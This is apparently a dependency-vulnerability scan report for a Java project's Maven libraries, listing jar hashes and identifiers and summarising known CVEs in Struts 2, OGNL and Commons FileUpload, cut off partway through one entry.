File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-server/0.8.2/atlassian-xmlrpc-binder-server-0.8.2.jar
MD5: c9b77d8c772493c6b92fabfea618c5fa
SHA1: d6ee40622987871abb31eeee4bf03a7f17ea0e7c
SHA256:cde605e0497e0697ba258c0a03842663b0fb6edc95c7a5c8952e73beb9818cfd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-annotations-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-annotations/0.8.2/atlassian-xmlrpc-binder-annotations-0.8.2.jar
MD5: daffba99a45f8183e3f3fe5e4efb9b63
SHA1: b4d14cc160d019ee5365570856621a77d80ac213
SHA256:3e6c457503eeafe0d748c9a951576e1aa25d173d6bf351da98076622b2491c76
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-annotations:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder/0.8.2/atlassian-xmlrpc-binder-0.8.2.jar
MD5: 529d5964f47e49f3cfef843021531c6d
SHA1: ec50fd85f0604d0fde8a5fe55c61fd8c62117dde
SHA256:e1376d47afcb75e95f5a56f2f5dfe0ee6989404e6959d751f028143e81fa26b7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder:0.8.2  Confidence:Highest

slf4j-log4j12-1.5.0.jar

Description:

 
		The slf4j log4j-12 binding
	

File Path: /Users/Kevin/.m2/repository/org/slf4j/slf4j-log4j12/1.5.0/slf4j-log4j12-1.5.0.jar
MD5: e70665b12f90cd2089e00e3ea898f9e3
SHA1: aad1074d37a63f19fafedd272dc7830f0f41a977
SHA256:c23ecab161aa16467ada68c6073f1ace58b4bfc8a5865e2575cbe2fb2aed1d46
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.slf4j:slf4j-log4j12:1.5.0  Confidence:Highest
  • cpe: cpe:/a:slf4j:slf4j:1.5.0  Confidence:Low  

maven-plugin-api-2.0.jar

Description:

 Maven is a project development management and comprehension tool. Based on the concept of a project object model: builds, dependency management, documentation creation, site publication, and distribution publication are all controlled from the declarative file. Maven can be extended by plugins to utilise a number of other development tools for reporting or the build process.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-plugin-api/2.0/maven-plugin-api-2.0.jar
MD5: c714c3aeccb4077866231655c08d4e3f
SHA1: 163ff2bc46c56d26e37e82a2cd79408c394a01e2
SHA256:5b62626069d85bb463314572734988d47bc98aab9f0ed48d2f1f9554960f5a35
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-plugin-api:2.0  Confidence:Highest

maven-shared-io-1.0.jar

Description:

 Basic API for lightweight logging

File Path: /Users/Kevin/.m2/repository/org/apache/maven/shared/maven-shared-io/1.0/maven-shared-io-1.0.jar
MD5: 915fe319be8f71e41646d588cab87ab4
SHA1: 6ba6241653b04c174bdcbc73829ca719f353f24d
SHA256:62a4d7ab57706fbdbad89ad55f21cdf63ede5e8a5323b528d6c330e3fd36b1d2
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.shared:maven-shared-io:1.0  Confidence:Highest

file-management-1.1.jar

Description:

 Basic API for lightweight logging

File Path: /Users/Kevin/.m2/repository/org/apache/maven/shared/file-management/1.1/file-management-1.1.jar
MD5: 48c2abe6b3a5045649714d06eceb6bbd
SHA1: 1a751b5b40520478458f31dca58d763c34580755
SHA256:b7d139b2a04687d399fb296a1d6c1d7925b54a65c2ace87b1cd4ea20e3d422c1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.shared:file-management:1.1  Confidence:Highest

plexus-utils-1.5.4.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-utils/1.5.4/plexus-utils-1.5.4.jar
MD5: 602b8b5ed32782f8cc42b9a216a9d8d9
SHA1: dedb557166fbd043f54928baa9134c00e73b8abf
SHA256:b5035e5abfd9d3c73c9311a5ac54de59248d1242ee5fa47212d0fcb097b1cd1e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-utils:1.5.4  Confidence:Highest

plexus-classworlds-1.2-alpha-7.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-classworlds/1.2-alpha-7/plexus-classworlds-1.2-alpha-7.jar
MD5: b00a4521e82cd7cdf502039dd59a1ffb
SHA1: ed03d1eeb9b2576747df0d2883d9006fa5e1febe
SHA256:8d0b03d23ab40c94db71f93bd64b2fdd525d86dda3f4b40474fb9eb27c369f96
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-classworlds:1.2-alpha-7  Confidence:Highest

junit-3.8.1.jar

Description:

 
    JUnit is a regression testing framework written by Erich Gamma and Kent Beck. It is used by the developer who implements unit tests in Java.
  

License:

Common Public License Version 1.0: http://www.opensource.org/licenses/cpl1.0.txt
File Path: /Users/Kevin/.m2/repository/junit/junit/3.8.1/junit-3.8.1.jar
MD5: 1f40fb782a4f2cf78f161d32670f7a3a
SHA1: 99129f16442844f6a4a11ae22fbbee40b14d774f
SHA256:b58e459509e190bed737f3592bc1950485322846cf10e78ded1d065153012d70
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: junit:junit:3.8.1  Confidence:Highest

plexus-component-api-1.0-alpha-19.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-component-api/1.0-alpha-19/plexus-component-api-1.0-alpha-19.jar
MD5: 0c262ada46d9b749a76cab5a3fd7fc1b
SHA1: 9e375389c203bdd31a73f3ca6d1bd7e015deb3f1
SHA256:a9d96e7c8240901169559ce2a6fc2f1621d61331d4fde0859d77afbddf8f8991
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-component-api:1.0-alpha-19  Confidence:Highest

backport-util-concurrent-3.0.jar

Description:

 Dawid Kurzyniec's backport of JSR 166

License:

Public Domain: http://creativecommons.org/licenses/publicdomain
File Path: /Users/Kevin/.m2/repository/backport-util-concurrent/backport-util-concurrent/3.0/backport-util-concurrent-3.0.jar
MD5: 6ab04326a80e57fd8972d50640a14088
SHA1: a193f67b87fe7782a13f1031dce4fa822c0e3599
SHA256:376155ee3d0eee07a89aaf09c1ce43fc6e24d073ce03dafbc382e9aac66a917e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: backport-util-concurrent:backport-util-concurrent:3.0  Confidence:Highest

plexus-taskqueue-1.0-alpha-8.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-taskqueue/1.0-alpha-8/plexus-taskqueue-1.0-alpha-8.jar
MD5: d70dfef01fc8fd62672d57ed2bdc6fb8
SHA1: b50820160f0a471b783843526b225b65bfaeb237
SHA256:b60d41607085795ef81d6f125cf45b3ab370cf2f8f14d538f6946b801d9137d7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-taskqueue:1.0-alpha-8  Confidence:Highest

plexus-action-1.0-alpha-6.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-action/1.0-alpha-6/plexus-action-1.0-alpha-6.jar
MD5: 74e61c8cbeaec660b6e8225d0971cf67
SHA1: 94d6b8cbb03e5352dda96360ad350c60d98a6145
SHA256:04b4459f54cc1acaa7fd2b5362652ac08ee9e88775a6fb214e5c2c7ac2fe46fc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-action:1.0-alpha-6  Confidence:Highest

plexus-command-line-1.0-alpha-2.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-command-line/1.0-alpha-2/plexus-command-line-1.0-alpha-2.jar
MD5: 29580c08fcdc92c7c5675e6856033ae3
SHA1: 315d341a1bad7bdbacec10f2858807942e695af8
SHA256:0498f74932ffe4b19a40031bb76481c6ef0ad4fe72b9dc10d814deda75694030
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-command-line:1.0-alpha-2  Confidence:Highest

plexus-interactivity-api-1.0-alpha-6.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-6/plexus-interactivity-api-1.0-alpha-6.jar
MD5: 4f3e3b8a34729e317e4c2484016ca151
SHA1: c06f0eb818633033f09a87d14c4cfb6f39af9a37
SHA256:4009db61dc8bc1ab5895bf5195718fd4df84998409e15acfb9aa796895ceddbf
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-interactivity-api:1.0-alpha-6  Confidence:Highest

maven-scm-manager-plexus-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-manager-plexus/1.0/maven-scm-manager-plexus-1.0.jar
MD5: 90f1e4f233268f07f731b01cbb48b1fb
SHA1: bbcfe0ba800dc3c43e52bb62ef47ab8034f6081c
SHA256:4730522a2409fbd289050cdf8338f24d9021ea7ad5c04a104ad112ae9fd8ec37
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-manager-plexus:1.0  Confidence:Highest

regexp-1.3.jar

File Path: /Users/Kevin/.m2/repository/regexp/regexp/1.3/regexp-1.3.jar
MD5: 6dcdc325850e40b843cac2a25fb2121e
SHA1: 973df2b78b67bcd3144c3dbbb88da691065a3f8d
SHA256:27998732ecd5745924644f891f41adaf73736fe259a0a20843979452574f0385
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: regexp:regexp:1.3  Confidence:Highest

maven-scm-provider-bazaar-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-bazaar/1.0/maven-scm-provider-bazaar-1.0.jar
MD5: 8c3ca2128efca24b8813c3dd04e96dd3
SHA1: 39e76acec7879b25fedb76f429bdd389b7694f8e
SHA256:bc8c8bb235b87211afa6e7745e3f5b82b9afd85f7716439b2cc63d98245e7217
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-bazaar:1.0  Confidence:Highest

maven-scm-provider-clearcase-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-clearcase/1.0/maven-scm-provider-clearcase-1.0.jar
MD5: 7c2880aa644ea153b1999f84c44c712f
SHA1: 3f2c8a21974336eab5e556193c3c552c1e8324e7
SHA256:e9881b07c7dc737f287fb9f5406ddc15cc0d3f1b67aaf78a14fd8a086085f33d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-clearcase:1.0  Confidence:Highest

maven-scm-provider-cvsexe-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvsexe/1.0/maven-scm-provider-cvsexe-1.0.jar
MD5: 0a6a7dcad41d7c288f29d6b799989c20
SHA1: b063e4b0ffafd5c7bd4a7986464aca765e7ef127
SHA256:51b4525521299b7160d12ec1d18ebf6683fb4769bc936ba2574ae97319ed5a4e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvsexe:1.0  Confidence:Highest

cvsclient-20060125.jar

License:

Sun Public License: http://www.netbeans.org/about/legal/spl.html
File Path: /Users/Kevin/.m2/repository/org/netbeans/lib/cvsclient/20060125/cvsclient-20060125.jar
MD5: d37c0e11f9b2d3fdde5a999ba9418abb
SHA1: cc80bd0085c79be7ed332cbdc1db77498bff1fda
SHA256:89baed753b393d5074d4b9b4ba4b9692af6cd0713199998fb294b99942c820a3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.netbeans.lib:cvsclient:20060125  Confidence:Highest

ganymed-ssh2-build210.jar

Description:

 Ganymed SSH2 for Java is a library which implements the SSH-2 protocol in pure Java

License:

BSD style license: http://www.ganymed.ethz.ch/ssh2/LICENSE.txt
File Path: /Users/Kevin/.m2/repository/ch/ethz/ganymed/ganymed-ssh2/build210/ganymed-ssh2-build210.jar
MD5: d898fe406a32b5c55283c719cb48328b
SHA1: b2f81c85a7a2a1b43727d2582710af85c979050b
SHA256:ee53bd7b41e1a45e1a263eca8ebbfc0b7acf4f9c442f4e707710c6599b80fcd5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: ch.ethz.ganymed:ganymed-ssh2:build210  Confidence:Highest

maven-scm-provider-cvsjava-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvsjava/1.0/maven-scm-provider-cvsjava-1.0.jar
MD5: 0c2297a4e6dea48ff1a7149f366c753c
SHA1: 30da1cd389c8cc8dacc55b5c0393cc88510868d0
SHA256:39a4fea7d80966f446be883cacd824c03280706e3ce57981cc0003f1058cb1fa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvsjava:1.0  Confidence:Highest

maven-scm-provider-hg-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-hg/1.0/maven-scm-provider-hg-1.0.jar
MD5: dbc2591642d096b1e6708e9050ef6980
SHA1: 65be347b1e595e8569bb69e762b53eb5cf972cf0
SHA256:e15a6fcd13b077d9f7cee50647b54a6430c2930dc6b97f42832f0a2a7f45bf6b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-hg:1.0  Confidence:Highest

maven-scm-provider-perforce-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-perforce/1.0/maven-scm-provider-perforce-1.0.jar
MD5: 932c412e13615873f47ddcfb43c3cd83
SHA1: 8d4e631f11688a102ed6905e08e66a536ff7fedc
SHA256:2d05bd2e9273eaebf98e2984f66608546520e57b211da399aa2e718a8df59283
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-perforce:1.0  Confidence:Highest

maven-scm-provider-starteam-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-starteam/1.0/maven-scm-provider-starteam-1.0.jar
MD5: ccd5be49cc58ee6c699f185530219fee
SHA1: 4cd940529154e36386ddeab9ebd365eafd130c7f
SHA256:699dcdf0ed2ee84c22372d780b9b6bc6df94c95668d968783c6ea525675fb445
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-starteam:1.0  Confidence:Highest

maven-scm-provider-svnexe-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-svnexe/1.0/maven-scm-provider-svnexe-1.0.jar
MD5: 962c8d753de818c1ebcc643bf585a88a
SHA1: 3ea987bb241773454acf4c5738e5250757e2dcda
SHA256:6a45753fbaae26435aae5fbf2b4c31bbd65b49dc0f7e8ef39b50a7717f471bc8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-svnexe:1.0  Confidence:Highest

maven-scm-provider-synergy-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-synergy/1.0/maven-scm-provider-synergy-1.0.jar
MD5: a7fb33175376ba79f699d290f0257edb
SHA1: 6df31f97dfcde65c8dfea7fd5149dea2ee1ebd04
SHA256:b2aa4455b73aabfe1c428d03bd640e1785a30dbd583c5c60711a390902d5029e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-synergy:1.0  Confidence:Highest

jdom-1.0.jar

File Path: /Users/Kevin/.m2/repository/jdom/jdom/1.0/jdom-1.0.jar
MD5: 0b8f97de82fc9529b1028a77125ce4f8
SHA1: a2ac1cd690ab4c80defe7f9bce14d35934c35cec
SHA256:3b23bc3979aec14a952a12aafc483010dc57579775f2ffcacef5256a90eeda02
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: jdom:jdom:1.0  Confidence:Highest

jaxen-1.1-beta-8.jar

Description:

 Jaxen is a universal Java XPath engine.

File Path: /Users/Kevin/.m2/repository/jaxen/jaxen/1.1-beta-8/jaxen-1.1-beta-8.jar
MD5: f02f59d819544e8e6299b7010e98cc40
SHA1: b0bbd0cc28b4ec88b58d304896f7be7598e1c909
SHA256:b07b476859e37066ef04fcd98ef874bcbf5896c048ec99787e77aa15cc07e073
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: jaxen:jaxen:1.1-beta-8  Confidence:Highest

maven-release-manager-1.0-alpha-3.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/release/maven-release-manager/1.0-alpha-3/maven-release-manager-1.0-alpha-3.jar
MD5: 8ccc6fdf4a3ba9b10b728e888605f0ee
SHA1: c1be3e419bd582928604fd553027bbd4b6b0c23e
SHA256:47bc0432a05253b8e81dba460cb3d8dfdf7d3077f7daa1e32367f50adee9cc6c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.release:maven-release-manager:1.0-alpha-3  Confidence:Highest

slf4j-api-1.5.6.jar

Description:

 The slf4j API

File Path: /Users/Kevin/.m2/repository/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar
MD5: ca55c6dae5d0f9a8a829720408918586
SHA1: ec9b7142625dfa1dcaf22db99ecb7c555ffa714d
SHA256:b96864a2ad8c005d62351a500d72d2545b3bcb3e30564a64b0c467c935de8303
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.slf4j:slf4j-api:1.5.6  Confidence:Highest
  • cpe: cpe:/a:slf4j:slf4j:1.5.6  Confidence:Low  

jsr250-api-1.0.jar

Description:

 JSR-250 Reference Implementation by Glassfish

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /Users/Kevin/.m2/repository/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar
MD5: 4cd56b2e4977e541186de69f5126b4a6
SHA1: 5025422767732a1ab45d93abfea846513d742dcf
SHA256:a1a922d0d9b6d183ed3800dfac01d1e1eb159f0e8c6f94736931c1def54a941f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.annotation:jsr250-api:1.0  Confidence:Highest

continuum-buildagent-core-1.3.2.jar

File Path: /Users/Kevin/.m2/repository/org/apache/continuum/continuum-buildagent-core/1.3.2/continuum-buildagent-core-1.3.2.jar
MD5: 2aa60763500b161a291c0582c509c781
SHA1: 9bd9b0b3c488a33a7501eea4b1850d8fe31f452a
SHA256:22efdf61cebc17fc79ae1e2bcf4de505cbbad6d9ea2cebb874678fbfa740b6a6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.continuum:continuum-buildagent-core:1.3.2  Confidence:Highest
  • cpe: cpe:/a:apache:continuum:1.3.2  Confidence:Low  

lz4-1.1.2.jar

Description:

 Java ports and bindings of the LZ4 compression algorithm and the xxHash hashing algorithm

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/jpountz/lz4/lz4/1.1.2/lz4-1.1.2.jar
MD5: 3ba70aef4e8a60aa60c8d1f00c8ea357
SHA1: b9bf619cffac8585ec1877ebf876ec68c85fc980
SHA256:9879a63b4f952f5db1bc322eb99f872a36df7fbc24b56469caa4b234fbba4160
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.jpountz.lz4:lz4:1.1.2  Confidence:Highest

asm-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm/3.3/asm-3.3.jar
MD5: 968575ef15e4024d205fa6ecddec67a9
SHA1: fb0f302a91a376fd5cfe23167c419375e8fc9b8f
SHA256:07e685c385c652a3d2c4a08312004f653ba508e325d70ff3d9e8687d1ac6a8da
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm:3.3  Confidence:Highest

asm-tree-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm-tree/3.3/asm-tree-3.3.jar
MD5: 3eeafc985d3ca624abf2d3ad549180d0
SHA1: 33c13070f194e1f0385877ec9306a24e983b00e3
SHA256:d0d8a92d855a015db402675af123c8f39010501ba1d34a5072301ce6caf137ea
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm-tree:3.3  Confidence:Highest

asm-commons-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm-commons/3.3/asm-commons-3.3.jar
MD5: 47d6178194c38fc70d4e27db08ae5d10
SHA1: 3630d2095238beee3f94670af3d9a9dc115ce887
SHA256:1cc6e5bcfab550397289875ac133d86562d4ec2f3875afa7c5c033d1f0ee96af
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm-commons:3.3  Confidence:Highest

xwork-core-2.3.24.jar

Description:

 Apache Struts 2

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/struts/xwork/xwork-core/2.3.24/xwork-core-2.3.24.jar
MD5: bf93d0ee8ed38a7353ba1ca0c15e20b5
SHA1: 2494f67f3e7f91e06a48e739b772e8dd283bb52e
SHA256:fa9a0cae06a735123459ad9df26463dc12658788eb35db19b0434dad9f826db6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.struts.xwork:xwork-core:2.3.24  Confidence:Highest

freemarker-2.3.22.jar

Description:

 
    FreeMarker is a "template engine"; a generic tool to generate text output based on templates.
  

License:

Apache License, Version 2.0: http://freemarker.org/LICENSE.txt
File Path: /Users/Kevin/.m2/repository/org/freemarker/freemarker/2.3.22/freemarker-2.3.22.jar
MD5: 51cca65040c41326e9b6b2806aba23ff
SHA1: 473d784b3cd2dcb6d49a287ded0542b7862c7d68
SHA256:58502c0e47066cfde399d52aa5d81f83f990bbb43b044414969119c25c1a9c6f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.freemarker:freemarker:2.3.22  Confidence:Highest

javassist-3.11.0.GA.jar

Description:

 Javassist (JAVA programming ASSISTant) makes Java bytecode manipulation
     simple.  It is a class library for editing bytecodes in Java.
  

File Path: /Users/Kevin/.m2/repository/javassist/javassist/3.11.0.GA/javassist-3.11.0.GA.jar
MD5: cb8f91e65864b85c8c6f87164e3252a5
SHA1: 2c00105734a57e9ee4f27e4b17cd43200e5f0ff8
SHA256:aa8c27fc46be68c58c25eab15bf3073587945e009455385da78439dea684ef58
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javassist:javassist:3.11.0.GA  Confidence:Highest

ognl-3.0.6.jar

Description:

 OGNL - Object Graph Navigation Library

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/ognl/ognl/3.0.6/ognl-3.0.6.jar
MD5: 2a8fb06b52574e498ed256b8fc64055e
SHA1: a3665cf8e3426686ee751790f3d1e1ec5705e9dc
SHA256:3e9c7968f61371bb231df316123e6740944f72b59675843574c2f42d5e9f33cb
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:ognl_project:ognl:3.0.6  Confidence:Low  
  • maven: ognl:ognl:3.0.6  Confidence:Highest

CVE-2016-3093  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

Vulnerable Software & Versions: (show all)

commons-fileupload-1.3.1.jar

Description:

 
    The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart
    file upload functionality to servlets and web applications.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-fileupload/commons-fileupload/1.3.1/commons-fileupload-1.3.1.jar
MD5: ed8eec445e21ec7e49b86bf3cbcffcbc
SHA1: c621b54583719ac0310404463d6d99db27e1052c
SHA256:f4ae31866d62f91054fb3dfd0696efd08705e5e8ccd657b01b460a80044be532
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-1000031  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution

Vulnerable Software & Versions:

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions: (show all)

commons-io-2.2.jar

Description:

 
The Commons IO library contains utility classes, stream implementations, file filters, 
file comparators, endian transformation classes, and much more.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-io/commons-io/2.2/commons-io-2.2.jar
MD5: 6ad49e3e16c2342e9ee9599ce04775e6
SHA1: 83b5b8a7ba1c08f9e8c8ff2373724e33d3c1e22a
SHA256:675f60bd11a82d481736591fe4054c66471fa5463d45616652fd71585792ba87
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-io:commons-io:2.2  Confidence:Highest

struts2-core-2.3.24.jar

Description:

 Apache Struts 2

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/struts/struts2-core/2.3.24/struts2-core-2.3.24.jar
MD5: f5c4aa120f74452cc8d3e2ba08c59208
SHA1: d1baacd603b0fa91217cb3552ae1577b18b5da27
SHA256:432247b4b7f68ba33abdaf3db3000adcdc30997b20ef0f00e51813293829ab7d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.struts:struts2-core:2.3.24  Confidence:Highest
  • cpe: cpe:/a:apache:struts:2.3.24  Confidence:Highest  

CVE-2015-5209  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.

Vulnerable Software & Versions: (show all)

CVE-2016-0785  

Severity:High
CVSS Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation.

Vulnerable Software & Versions:

CVE-2016-2162  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Apache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.

Vulnerable Software & Versions: (show all)

CVE-2016-3081  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.

Vulnerable Software & Versions: (show all)

CVE-2016-3082  

Severity:High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

XSLTResult in Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1 allows remote attackers to execute arbitrary code via the stylesheet location parameter.

Vulnerable Software & Versions: (show all)

CVE-2016-3087  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.

Vulnerable Software & Versions: (show all)

CVE-2016-3093  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2016-4003  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.

Vulnerable Software & Versions:

CVE-2016-4430  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

Apache Struts 2 2.3.20 through 2.3.28.1 mishandles token validation, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2016-4431  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
